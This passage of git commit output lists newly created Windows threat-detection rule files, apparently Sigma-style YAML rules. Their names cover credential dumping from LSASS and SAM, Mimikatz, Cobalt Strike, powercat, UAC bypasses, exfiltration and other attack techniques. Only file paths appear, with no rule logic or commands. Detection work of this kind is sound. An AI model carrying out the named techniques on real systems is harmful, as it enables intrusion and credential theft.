bin/main/rules/windows/builtin/system/win_invoke_obfuscation_via_use_clip_services.yml create mode 100644 bin/main/rules/windows/builtin/system/win_invoke_obfuscation_via_use_mshta_services.yml create mode 100644 bin/main/rules/windows/builtin/system/win_invoke_obfuscation_via_use_rundll32_services.yml create mode 100644 bin/main/rules/windows/builtin/system/win_invoke_obfuscation_via_var_services.yml create mode 100644 bin/main/rules/windows/builtin/system/win_lsasrv_ntlmv1.yml create mode 100644 bin/main/rules/windows/builtin/system/win_mal_creddumper.yml create mode 100644 bin/main/rules/windows/builtin/system/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml create mode 100644 bin/main/rules/windows/builtin/system/win_moriya_rootkit.yml create mode 100644 bin/main/rules/windows/builtin/system/win_ntfs_vuln_exploit.yml create mode 100644 bin/main/rules/windows/builtin/system/win_pcap_drivers.yml create mode 100644 bin/main/rules/windows/builtin/system/win_possible_zerologon_exploitation_using_wellknown_tools.yml create mode 100644 bin/main/rules/windows/builtin/system/win_powershell_script_installed_as_service.yml create mode 100644 bin/main/rules/windows/builtin/system/win_quarkspwdump_clearing_hive_access_history.yml create mode 100644 bin/main/rules/windows/builtin/system/win_rare_service_installs.yml create mode 100644 bin/main/rules/windows/builtin/system/win_rdp_potential_cve_2019_0708.yml create mode 100644 bin/main/rules/windows/builtin/system/win_sample_rule.yml create mode 100644 bin/main/rules/windows/builtin/system/win_security_krbrelayup_service_installation.yml create mode 100644 bin/main/rules/windows/builtin/system/win_service_hacktools.yml create mode 100644 bin/main/rules/windows/builtin/system/win_service_install_susp_double_ampersand.yml create mode 100644 bin/main/rules/windows/builtin/system/win_susp_dhcp_config.yml create mode 100644 bin/main/rules/windows/builtin/system/win_susp_dhcp_config_failed.yml create mode 100644 bin/main/rules/windows/builtin/system/win_susp_proceshacker.yml create mode 100644 bin/main/rules/windows/builtin/system/win_susp_sam_dump.yml create mode 100644 bin/main/rules/windows/builtin/system/win_susp_service_installation.yml create mode 100644 bin/main/rules/windows/builtin/system/win_susp_service_installation_folder.yml create mode 100644 bin/main/rules/windows/builtin/system/win_susp_service_installation_folder_pattern.yml create mode 100644 bin/main/rules/windows/builtin/system/win_susp_service_installation_script.yml create mode 100644 bin/main/rules/windows/builtin/system/win_susp_system_update_error.yml create mode 100644 bin/main/rules/windows/builtin/system/win_system_application_sysmon_crash.yml create mode 100644 bin/main/rules/windows/builtin/system/win_system_defender_disabled.yml create mode 100644 bin/main/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml create mode 100644 bin/main/rules/windows/builtin/system/win_tap_driver_installation.yml create mode 100644 bin/main/rules/windows/builtin/system/win_tool_psexec.yml create mode 100644 bin/main/rules/windows/builtin/system/win_volume_shadow_copy_mount.yml create mode 100644 bin/main/rules/windows/builtin/system/win_vul_cve_2020_1472.yml create mode 100644 bin/main/rules/windows/builtin/system/win_vul_cve_2021_42278_or_cve_2021_42287.yml create mode 100644 bin/main/rules/windows/builtin/taskscheduler/win_rare_schtask_creation.yml create mode 100644 bin/main/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml create mode 100644 bin/main/rules/windows/builtin/win_alert_mimikatz_keywords.yml create mode 100644 bin/main/rules/windows/builtin/win_susp_logon_newcredentials.yml create mode 100644 bin/main/rules/windows/builtin/windefend/win_alert_lsass_access.yml create mode 100644 bin/main/rules/windows/builtin/windefend/win_defender_amsi_trigger.yml create mode 100644 bin/main/rules/windows/builtin/windefend/win_defender_disabled.yml create mode 100644 bin/main/rules/windows/builtin/windefend/win_defender_exclusions.yml create mode 100644 bin/main/rules/windows/builtin/windefend/win_defender_history_delete.yml create mode 100644 bin/main/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml create mode 100644 bin/main/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml create mode 100644 bin/main/rules/windows/builtin/windefend/win_defender_threat.yml create mode 100644 bin/main/rules/windows/builtin/wmi/win_wmi_persistence.yml create mode 100644 bin/main/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml create mode 100644 bin/main/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml create mode 100644 bin/main/rules/windows/create_remote_thread/sysmon_cactustorch.yml create mode 100644 bin/main/rules/windows/create_remote_thread/sysmon_cobaltstrike_process_injection.yml create mode 100644 bin/main/rules/windows/create_remote_thread/sysmon_createremotethread_loadlibrary.yml create mode 100644 bin/main/rules/windows/create_remote_thread/sysmon_password_dumper_keepass.yml create mode 100644 bin/main/rules/windows/create_remote_thread/sysmon_password_dumper_lsass.yml create mode 100644 bin/main/rules/windows/create_remote_thread/sysmon_powershell_code_injection.yml create mode 100644 bin/main/rules/windows/create_remote_thread/sysmon_susp_powershell_rundll32.yml create mode 100644 bin/main/rules/windows/create_remote_thread/sysmon_susp_remote_thread.yml create mode 100644 bin/main/rules/windows/create_stream_hash/sysmon_ads_executable.yml create mode 100644 bin/main/rules/windows/create_stream_hash/sysmon_regedit_export_to_ads.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_ammyy.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_gotoopener.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_logmein.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_mega_nz.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_possible_dns_rebinding.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_susp_ipify.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_tor_onion.yml create mode 100644 bin/main/rules/windows/dns_query/dns_query_win_ufile_io.yml create mode 100644 bin/main/rules/windows/driver_load/driver_load_mal_creddumper.yml create mode 100644 bin/main/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml create mode 100644 bin/main/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml create mode 100644 bin/main/rules/windows/driver_load/driver_load_susp_temp_use.yml create mode 100644 bin/main/rules/windows/driver_load/driver_load_vuln_dell_driver.yml create mode 100644 bin/main/rules/windows/driver_load/driver_load_windivert.yml create mode 100644 bin/main/rules/windows/file_access/file_access_win_browser_credential_stealing.yml create mode 100644 bin/main/rules/windows/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml create mode 100644 bin/main/rules/windows/file_delete/file_delete_win_delete_appli_log.yml create mode 100644 bin/main/rules/windows/file_delete/file_delete_win_delete_backup_file.yml create mode 100644 bin/main/rules/windows/file_delete/file_delete_win_delete_prefetch.yml create mode 100644 bin/main/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_access_susp_unattend_xml.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_advanced_ip_scanner.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_anydesk_artefact.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_apt_unidentified_nov_18.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_crackmapexec_patterns.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_creation_new_shim_database.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_creation_scr_binary_file.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_creation_system_file.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_creation_unquoted_service_path.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_csharp_compile_artefact.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_cve_2021_1675_printspooler.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_cve_2021_26858_msexchange.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_cve_2021_41379_msi_lpe.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_cve_2021_44077_poc_default_files.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_cve_2022_24527_lpe.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_detect_powerup_dllhijacking.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_ghostpack_safetykatz.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_gotoopener_artefact.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_hack_dumpert.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_hivenightmare_file_exports.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_hktl_nppspy.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_install_teamviewer_desktop.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_iso_file_recent.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_lsass_dump.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_lsass_memory_dump_file_creation.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_lsass_werfault_dump.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_macro_file.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_mal_adwind.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_mal_octopus_scanner.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_mal_vhd_download.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_mimikatz_kirbi_file_creation.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_mimimaktz_memssp_log_file.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_moriya_rootkit.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_new_src_file.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_ntds_dit.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_ntds_exfil_tools.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_office_persistence.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_outlook_c2_macro_creation.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_outlook_newform.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_pcre_net_temp_file.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_pingback_backdoor.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_powershell_exploit_scripts.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_powershell_startup_shortcuts.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_quarkspw_filedump.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_rclone_exec_file.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_redmimicry_winnti_filedrop.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_sam_dump.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_screenconnect_artefact.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_script_creation_by_office_using_file_ext.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_startup_folder_file_write.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_adsi_cache_usage.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_clr_logs.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_colorcpl.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_creation_by_mobsync.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_default_gpo_dir_write.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_desktop_ini.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_desktop_txt.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_desktopimgdownldr_file.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_diagcab.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_dropper.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_exchange_aspx_write.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_get_variable.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_ntds_dit.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_pfx_file_creation.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_powershell_profile_create.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_system_interactive_powershell.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_task_write.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_susp_winword_startup.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_tool_psexec.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_tsclient_filewrite_startup.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_uac_bypass_consent_comctl32.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_uac_bypass_dotnet_profiler.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_uac_bypass_eventvwr.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_uac_bypass_ieinstal.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_uac_bypass_msconfig_gui.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_uac_bypass_winsat.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_uac_bypass_wmp.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_webshell_creation_detect.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_werfault_dll_hijacking.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_win_cscript_wscript_dropper.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_win_shell_write_susp_directory.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_winrm_awl_bypass.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_winword_cve_2021_40444.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_word_template_creation.yml create mode 100644 bin/main/rules/windows/file_event/file_event_win_writing_local_admin_share.yml create mode 100644 bin/main/rules/windows/file_rename/file_rename_win_not_dll_to_dll.yml create mode 100644 bin/main/rules/windows/image_load/image_load_abusing_azure_browser_sso.yml create mode 100644 bin/main/rules/windows/image_load/image_load_alternate_powershell_hosts_moduleload.yml create mode 100644 bin/main/rules/windows/image_load/image_load_foggyweb_nobelium.yml create mode 100644 bin/main/rules/windows/image_load/image_load_in_memory_powershell.yml create mode 100644 bin/main/rules/windows/image_load/image_load_mimikatz_inmemory_detection.yml create mode 100644 bin/main/rules/windows/image_load/image_load_msdt_sdiageng.yml create mode 100644 bin/main/rules/windows/image_load/image_load_pcre_net_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_pingback_backdoor.yml create mode 100644 bin/main/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml create mode 100644 bin/main/rules/windows/image_load/image_load_silenttrinity_stage_use.yml create mode 100644 bin/main/rules/windows/image_load/image_load_spoolsv_dll_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_advapi32_dll.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_fax_dll.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_image_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_office_dotnet_assembly_dll_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_office_dotnet_clr_dll_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_office_dotnet_gac_dll_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_office_dsparse_dll_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_office_kerberos_dll_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_python_image_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_system_drawing_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_vss_ps_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_susp_winword_vbadll_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_svchost_dll_search_order_hijack.yml create mode 100644 bin/main/rules/windows/image_load/image_load_tttracer_mod_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_uac_bypass_via_dism.yml create mode 100644 bin/main/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml create mode 100644 bin/main/rules/windows/image_load/image_load_unsigned_image_loaded_into_lsass.yml create mode 100644 bin/main/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml create mode 100644 bin/main/rules/windows/image_load/image_load_wmi_module_load.yml create mode 100644 bin/main/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml create mode 100644 bin/main/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml create mode 100644 bin/main/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml create mode 100644 bin/main/rules/windows/image_load/image_load_wsman_provider_image_load.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_susp_win_binary_no_cmdline.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_binary_github_com.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_binary_susp_com.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_crypto_mining.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_eqnedt.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_imewdbld.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_mega_nz.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_msiexec.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_python.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_rdp_to_http.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_susp_rdp.yml create mode 100644 bin/main/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_cred_dump_tools_named_pipes.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_psexec_pipes_artifacts.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml create mode 100644 bin/main/rules/windows/pipe_created/pipe_created_tool_psexec.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_tamper_with_windows_defender.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml create mode 100644 bin/main/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_powercat.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml create mode 100644 bin/main/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_azurehound_commands.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_copy_item_system32.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_data_compressed.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_dnscat_execution.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_file_and_directory_discovery.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_nightmare.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml create mode 100644 